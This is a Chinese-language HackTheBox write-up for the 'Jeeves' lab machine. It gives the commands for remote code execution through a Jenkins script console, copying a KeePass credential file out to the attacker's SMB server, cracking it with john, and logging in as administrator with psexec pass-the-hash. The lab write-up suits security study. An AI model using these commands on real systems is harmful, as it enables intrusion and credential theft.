Jeeves - HackTheBox
Td

image

nmap扫描

image

image

访问80

image

image

不管输入什么都是跳转到error页面

换5000端口Jetty看看

image

扫下目录

image

Jenkins的cms

image

image

在这里找到一个脚本控制台

https://www.hackingarticles.in/exploiting-jenkins-groovy-script-console-in-multiple-ways/

可以RCE

image

image

提权

image

貌似可以用烂土豆

image

win10专业版64位系统

image

补丁打了一大堆

image

在kohsuke目录下发现一个CEH.kdbx文件

https://www.reviversoft.com/zh-cn/file-extensions/kdbx

image

该文件存储有账户密码,下载下来

impacket-smbserver test pwd

image

本地开一个SMB服务

net use s: \\10.10.14.11\test

image

靶机连接

copy CEH.kdbx s:

image在将文件copy过来

在本地的test目录下pwd文件夹中就会得到CEH.kdbx文件

打开文件

kpcli --kdb CEH.kdbx

image

爆破一下

keepass2john CEH.kdbx > CEH

image

john --wordlist=/usr/share/wordlists/rockyou.txt CEH

image

image

一个个看

image

image

第一个貌似是个哈希密码,第二个是bob用户的密码

image

但是靶机上并没有bob这个用户,尝试用哈希登录

python psexec.py administrator@10.10.10.63 'cmd.exe' -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

image

image

flag文件并不直接存在

image

用more查看

more < hm.txt:root.txt

image

image